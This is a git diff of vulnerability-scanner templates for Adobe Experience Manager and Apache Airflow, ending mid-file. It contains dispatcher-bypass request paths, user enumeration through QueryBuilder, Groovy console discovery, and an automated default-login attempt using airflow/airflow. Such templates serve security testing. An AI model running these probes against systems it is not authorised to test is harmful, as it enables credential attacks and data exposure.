https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 + - https://github.com/devanshbatham/FavFreak + - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + metadata: + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,favicon,tech + +requests: + - method: GET + path: + - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" \ No newline at end of file diff --git a/poc/adobe/aem-detection-145.yaml b/poc/adobe/aem-detection-145.yaml deleted file mode 100644 index bb3d7e0753..0000000000 --- a/poc/adobe/aem-detection-145.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: aem-detection - -info: - name: Favicon based AEM Detection - author: shifacyclewala,hackergautam - severity: info - reference: - - https://twitter.com/brsn76945860/status/1171233054951501824 - - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a - - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - - https://github.com/devanshbatham/FavFreak - - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv - metadata: - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,favicon,tech,adobe - -requests: - - method: GET - path: - - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico" - - redirects: true - max-redirects: 2 - - matchers: - - type: dsl - dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/poc/adobe/aem-detection.yaml b/poc/adobe/aem-detection.yaml index 882cca92b6..4c92b48c8b 100644 --- a/poc/adobe/aem-detection.yaml +++ b/poc/adobe/aem-detection.yaml @@ -1,19 +1,16 @@ -id: aem-detection +id: favicon-detection-AEM info: - name: Favicon based AEM Detection - author: shifacyclewala,hackergautam + name: favicon-detection-AEM (Adobe Experience Manager) severity: info - reference: + author: shifacyclewala hackergautam + reference: | - https://twitter.com/brsn76945860/status/1171233054951501824 - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - https://github.com/devanshbatham/FavFreak - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv - metadata: - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,favicon,tech - + requests: - method: GET path: @@ -24,5 +21,6 @@ requests: matchers: - type: dsl + name: "Adobe Experience Manager (AEM)" dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/poc/adobe/aem-gql-servlet-147.yaml b/poc/adobe/aem-gql-servlet-147.yaml new file mode 100644 index 0000000000..b4c553151b --- /dev/null +++ b/poc/adobe/aem-gql-servlet-147.yaml @@ -0,0 +1,55 @@ +id: aem-gql-servlet + +info: + author: dhiyaneshDk,prettyboyaaditya + name: AEM GQLServlet + severity: low + reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html + tags: aem + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' + - '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=' + - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'excerpt' + - 'path' + - 'hits' + condition: and diff --git a/poc/adobe/aem-gql-servlet-149.yaml b/poc/adobe/aem-gql-servlet-149.yaml deleted file mode 100644 index 977dc70f75..0000000000 --- a/poc/adobe/aem-gql-servlet-149.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: aem-gql-servlet - -info: - name: AEM GQLServlet - author: dhiyaneshDk,prettyboyaaditya - severity: low - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' - - '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'excerpt' - - 'path' - - 'hits' - condition: and diff --git a/poc/adobe/aem-gql-servlet.yaml b/poc/adobe/aem-gql-servlet.yaml index b4c553151b..107ae55aa6 100644 --- a/poc/adobe/aem-gql-servlet.yaml +++ b/poc/adobe/aem-gql-servlet.yaml @@ -1,13 +1,17 @@ id: aem-gql-servlet info: - author: dhiyaneshDk,prettyboyaaditya name: AEM GQLServlet + author: dhiyaneshDk,prettyboyaaditya severity: low - reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html - tags: aem + reference: + - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html + metadata: + max-request: 29 + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,misconfig -requests: +http: - method: GET path: - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' @@ -41,6 +45,7 @@ requests: - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' stop-at-first-match: true + matchers-condition: and matchers: - type: status @@ -53,3 +58,5 @@ requests: - 'path' - 'hits' condition: and + +# digest: 4b0a00483046022100aef56cda988a934b87233b2bce2e5f11280ec834c5bfe96d92dc99db857a3301022100d6a30e41612d234a3b633bfecbaa196dd4082555b90e26602863b21fab5850f7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-groovyconsole-151.yaml b/poc/adobe/aem-groovyconsole-151.yaml index 11178dfc03..5ad79602c0 100644 --- a/poc/adobe/aem-groovyconsole-151.yaml +++ b/poc/adobe/aem-groovyconsole-151.yaml @@ -1,22 +1,29 @@ id: aem-groovyconsole + info: - name: AEM Groovy console enabled + name: AEM Groovy Console Discovery author: Dheerajmadhukar severity: critical - description: Groovy console is exposed, RCE is possible. + description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution. reference: - https://hackerone.com/reports/672243 - https://twitter.com/XHackerx007/status/1435139576314671105 - tags: aem -requests: + metadata: + max-request: 2 + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,adobe,hackerone,misconfig + +http: - method: GET path: - "{{BaseURL}}/groovyconsole" - "{{BaseURL}}/etc/groovyconsole.html" + headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -26,6 +33,9 @@ requests: - "Groovy Web Console" part: body condition: and + - type: status status: - 200 + +# digest: 4a0a00473045022043264a058b3f40cbb321ac1f9acaea06487cca638c087673eb48026c5fd0357c022100c4f8b8138448c20109589a47d17deb0ed23d8cd236ae29842aeb545dc53a9d07:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-groovyconsole-153.yaml b/poc/adobe/aem-groovyconsole-153.yaml new file mode 100644 index 0000000000..2d05325869 --- /dev/null +++ b/poc/adobe/aem-groovyconsole-153.yaml @@ -0,0 +1,37 @@ +id: aem-groovyconsole + +info: + name: AEM Groovy Console Discovery + author: Dheerajmadhukar + severity: critical + description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution. + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 + tags: aem,adobe + +requests: + - method: GET + path: + - "{{BaseURL}}/groovyconsole" + - "{{BaseURL}}/etc/groovyconsole.html" + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9,hi;q=0.8 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Groovy Console" + - "Run Script" + - "Groovy Web Console" + part: body + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/poc/adobe/aem-jcr-querybuilder-164.yaml b/poc/adobe/aem-jcr-querybuilder-164.yaml index 8f3e065dcf..15a5d6c4d4 100644 --- a/poc/adobe/aem-jcr-querybuilder-164.yaml +++ b/poc/adobe/aem-jcr-querybuilder-164.yaml @@ -1,28 +1,28 @@ -id: aem-jcr-querybuilder - -info: - author: DhiyaneshDk - name: Query JCR role via QueryBuilder Servlet - severity: info - tags: aem - -requests: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"success":true' - - 'jcr:uuid' +id: aem-jcr-querybuilder + +info: + name: Query JCR role via QueryBuilder Servlet + author: DhiyaneshDk + severity: info + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'jcr:uuid' condition: and \ No newline at end of file diff --git a/poc/adobe/aem-login-status-170.yaml b/poc/adobe/aem-login-status-170.yaml new file mode 100644 index 0000000000..d8446f7869 --- /dev/null +++ b/poc/adobe/aem-login-status-170.yaml @@ -0,0 +1,24 @@ +id: aem-login-status + +info: + author: DhiyaneshDk + name: AEM Login Status + severity: info + reference: https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/system/sling/loginstatus.css' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'CREDENTIAL_CHALLENGE' + condition: and diff --git a/poc/adobe/aem-login-status-171.yaml b/poc/adobe/aem-login-status.yaml similarity index 100% rename from poc/adobe/aem-login-status-171.yaml rename to poc/adobe/aem-login-status.yaml diff --git a/poc/adobe/aem-merge-metadata-servlet-172.yaml b/poc/adobe/aem-merge-metadata-servlet-172.yaml deleted file mode 100644 index 7f4a093732..0000000000 --- a/poc/adobe/aem-merge-metadata-servlet-172.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: aem-merge-metadata-servlet - -info: - name: AEM MergeMetadataServlet - author: DhiyaneshDk - severity: info - reference: - - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig - -http: - - method: GET - path: - - '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'assetPaths' - condition: and - -# digest: 4a0a0047304502204c5922229b04b36c72ca391555bf2cbb57bca10d36b6281cd4d4f7677fc222fa022100b04f9edf21b17af0df74d22e4d9de9706c52fe5a1e4ab6ef1d0f725d81bb0c7c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-merge-metadata-servlet.yaml b/poc/adobe/aem-merge-metadata-servlet.yaml new file mode 100644 index 0000000000..0f174a63fe --- /dev/null +++ b/poc/adobe/aem-merge-metadata-servlet.yaml @@ -0,0 +1,24 @@ +id: aem-merge-metadata-servlet + +info: + author: DhiyaneshDk + name: AEM MergeMetadataServlet + severity: info + reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'assetPaths' + condition: and diff --git a/poc/adobe/aem-querybuilder-feed-servlet.yaml b/poc/adobe/aem-querybuilder-feed-servlet.yaml deleted file mode 100644 index 4f840f4bca..0000000000 --- a/poc/adobe/aem-querybuilder-feed-servlet.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: aem-querybuilder-feed-servlet - -info: - author: DhiyaneshDk - name: AEM QueryBuilder Feed Servlet - severity: info - reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.feed' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'CQ Feed' \ No newline at end of file diff --git a/poc/adobe/aem-querybuilder-internal-path-read-181.yaml b/poc/adobe/aem-querybuilder-internal-path-read-179.yaml similarity index 100% rename from poc/adobe/aem-querybuilder-internal-path-read-181.yaml rename to poc/adobe/aem-querybuilder-internal-path-read-179.yaml diff --git a/poc/adobe/aem-querybuilder-json-servlet-182.yaml b/poc/adobe/aem-querybuilder-json-servlet-182.yaml new file mode 100644 index 0000000000..073fc99968 --- /dev/null +++ b/poc/adobe/aem-querybuilder-json-servlet-182.yaml @@ -0,0 +1,42 @@ +id: aem-querybuilder-json-servlet + +info: + author: DhiyaneshDk + name: AEM QueryBuilder Json Servlet + severity: info + description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet. + reference: + - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java + tags: aem,adobe + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.json' + - '{{BaseURL}}/bin/querybuilder.json.servlet' + - '{{BaseURL}}///bin///querybuilder.json' + - '{{BaseURL}}///bin///querybuilder.json.servlet' + - '{{BaseURL}}/bin/querybuilder.feed' + - '{{BaseURL}}/bin/querybuilder.feed.servlet' + - '{{BaseURL}}///bin///querybuilder.feed' + - ' {{BaseURL}}///bin///querybuilder.feed.servlet' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - 'success' + - 'results' + condition: and diff --git a/poc/adobe/aem-querybuilder-json-servlet-186.yaml b/poc/adobe/aem-querybuilder-json-servlet-186.yaml index 18210457c8..1099f8bdd7 100644 --- a/poc/adobe/aem-querybuilder-json-servlet-186.yaml +++ b/poc/adobe/aem-querybuilder-json-servlet-186.yaml @@ -1,30 +1,30 @@ -id: aem-querybuilder-json-servlet - -info: - author: DhiyaneshDk - name: AEM QueryBuilder Json Servlet - severity: info - reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header - - - type: word - words: - - 'success' - - 'results' - condition: and +id: aem-querybuilder-json-servlet + +info: + author: DhiyaneshDk + name: AEM QueryBuilder Json Servlet + severity: info + reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.json' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - 'success' + - 'results' + condition: and diff --git a/poc/adobe/aem-querybuilder-json-servlet-187.yaml b/poc/adobe/aem-querybuilder-json-servlet-187.yaml index 073fc99968..18210457c8 100644 --- a/poc/adobe/aem-querybuilder-json-servlet-187.yaml +++ b/poc/adobe/aem-querybuilder-json-servlet-187.yaml @@ -4,26 +4,14 @@ info: author: DhiyaneshDk name: AEM QueryBuilder Json Servlet severity: info - description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet. - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java - tags: aem,adobe + reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + tags: aem requests: - method: GET path: - '{{BaseURL}}/bin/querybuilder.json' - - '{{BaseURL}}/bin/querybuilder.json.servlet' - - '{{BaseURL}}///bin///querybuilder.json' - - '{{BaseURL}}///bin///querybuilder.json.servlet' - - '{{BaseURL}}/bin/querybuilder.feed' - - '{{BaseURL}}/bin/querybuilder.feed.servlet' - - '{{BaseURL}}///bin///querybuilder.feed' - - ' {{BaseURL}}///bin///querybuilder.feed.servlet' - - stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/poc/adobe/aem-userinfo-servlet-193.yaml b/poc/adobe/aem-userinfo-servlet-193.yaml index a18d740fa1..0fe58a4195 100644 --- a/poc/adobe/aem-userinfo-servlet-193.yaml +++ b/poc/adobe/aem-userinfo-servlet-193.yaml @@ -1,11 +1,12 @@ id: aem-userinfo-servlet info: - name: AEM UserInfo Servlet Credentials Exposure author: DhiyaneshDk + name: AEM UserInfo Servlet severity: info - description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node." - tags: aem,bruteforce + description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem + requests: - method: GET @@ -18,15 +19,7 @@ requests: - 200 - type: word - part: body words: - - '"userID":' - - '"userName":' + - 'userName' + - 'userID' condition: and - - - type: word - part: header - words: - - 'application/json' - -# Enhanced by mp on 2022/04/05 diff --git a/poc/adobe/aem-wcm-suggestions-servlet-194.yaml b/poc/adobe/aem-wcm-suggestions-servlet-196.yaml similarity index 100% rename from poc/adobe/aem-wcm-suggestions-servlet-194.yaml rename to poc/adobe/aem-wcm-suggestions-servlet-196.yaml diff --git a/poc/airflow/airflow-configuration-exposure-230.yaml b/poc/airflow/airflow-configuration-exposure-230.yaml deleted file mode 100644 index cf3c868a49..0000000000 --- a/poc/airflow/airflow-configuration-exposure-230.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: airflow-configuration-exposure - -info: - name: Apache Airflow Configuration Page - Detect - author: pdteam - severity: medium - description: Apache Airflow configuration page was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: exposure,config,airflow,apache - -http: - - method: GET - path: - - '{{BaseURL}}/airflow.cfg' - - matchers: - - type: word - words: - - '[core]' - - '[api]' - condition: and - -# digest: 490a0046304402206aceac3eef9d1011acca2593ab1f1074b0c2660f72664032cd16f303ce92a0560220386b52c069575817b5cf264f62693e1c71440f7d7b50f57bd589cae2c37c8f1d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/airflow/airflow-configuration-exposure.yaml b/poc/airflow/airflow-configuration-exposure.yaml new file mode 100644 index 0000000000..f4ae81eff2 --- /dev/null +++ b/poc/airflow/airflow-configuration-exposure.yaml @@ -0,0 +1,16 @@ +id: airflow-configuration-exposure +info: + name: Apache Airflow Configuration Exposure + author: pdteam + severity: medium + tags: exposure,config,airflow,apache +requests: + - method: GET + path: + - '{{BaseURL}}/airflow.cfg' + matchers: + - type: word + words: + - '[core]' + - '[api]' + condition: and diff --git a/poc/airflow/airflow-default-login-236.yaml b/poc/airflow/airflow-default-login-236.yaml index cef2568e5d..772e1ffd78 100644 --- a/poc/airflow/airflow-default-login-236.yaml +++ b/poc/airflow/airflow-default-login-236.yaml @@ -1,18 +1,27 @@ id: airflow-default-login + info: name: Apache Airflow Default Login author: pdteam - severity: critical - tags: airflow,default-login,apache - reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + severity: high + description: An Apache Airflow default login was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Sign In - Airflow" + tags: airflow,default-login,apache + requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} + - | POST /login/ HTTP/1.1 Host: {{Hostname}} @@ -21,12 +30,14 @@ requests: Referer: {{BaseURL}}/admin/airflow/login username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + attack: pitchfork payloads: username: - airflow password: - airflow + cookie-reuse: true extractors: - type: regex @@ -35,6 +46,7 @@ requests: internal: true regex: - 'type="hidden" value="(.*?)">' + req-condition: true matchers-condition: and matchers: @@ -44,6 +56,9 @@ requests: - 'contains(all_headers_2, "session=.")' - 'status_code_2 == 302' condition: and + - type: word words: - 'You should be redirected automatically to target URL: ' + +# Enhanced by mp on 2022/03/22 diff --git a/poc/airflow/airflow-detect-239.yaml b/poc/airflow/airflow-detect-239.yaml new file mode 100644 index 0000000000..f2d6d97aa2 --- /dev/null +++ b/poc/airflow/airflow-detect-239.yaml @@ -0,0 +1,24 @@ +id: airflow-detect + +info: + name: Apache Airflow + author: pdteam + severity: info + tags: tech,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow 404 = lots of circles" + + - type: status + status: + - 404 \ No newline at end of file diff --git a/poc/airflow/airflow-detect-240.yaml b/poc/airflow/airflow-detect.yaml similarity index 100% rename from poc/airflow/airflow-detect-240.yaml rename to poc/airflow/airflow-detect.yaml diff --git a/poc/airflow/airflow-panel-244.yaml b/poc/airflow/airflow-panel-244.yaml index 8509d74c08..1df0b6c38b 100644 --- a/poc/airflow/airflow-panel-244.yaml +++ b/poc/airflow/airflow-panel-244.yaml @@ -7,14 +7,13 @@ info: description: An Apache Airflow admin login panel was discovered. reference: - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html - tags: panel,apache,airflow,admin - metadata: - shodan-query: title:"Sign In - Airflow" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + shodan-query: title:"Sign In - Airflow" + tags: panel,apache,airflow,admin requests: - method: GET diff --git a/poc/airflow/unauthenticated-airflow-10884.yaml b/poc/airflow/unauthenticated-airflow-10884.yaml new file mode 100644 index 0000000000..50ca17d92a --- /dev/null +++ b/poc/airflow/unauthenticated-airflow-10884.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-airflow-instance + +info: + name: Unauthenticated Airflow Instance + author: dhiyaneshDK + severity: high + tags: apache,airflow,unauth + metadata: + shodan-query: title:"Airflow - DAGs" + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/admin/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Airflow - DAGs" + + - type: status + status: + - 200 diff --git a/poc/airflow/unauthenticated-airflow-10886.yaml b/poc/airflow/unauthenticated-airflow-10886.yaml index afe4ed1f3c..addadb23e3 100644 --- a/poc/airflow/unauthenticated-airflow-10886.yaml +++ b/poc/airflow/unauthenticated-airflow-10886.yaml @@ -3,9 +3,9 @@ info: name: Unauthenticated Airflow Instance author: dhiyaneshDK severity: high + tags: 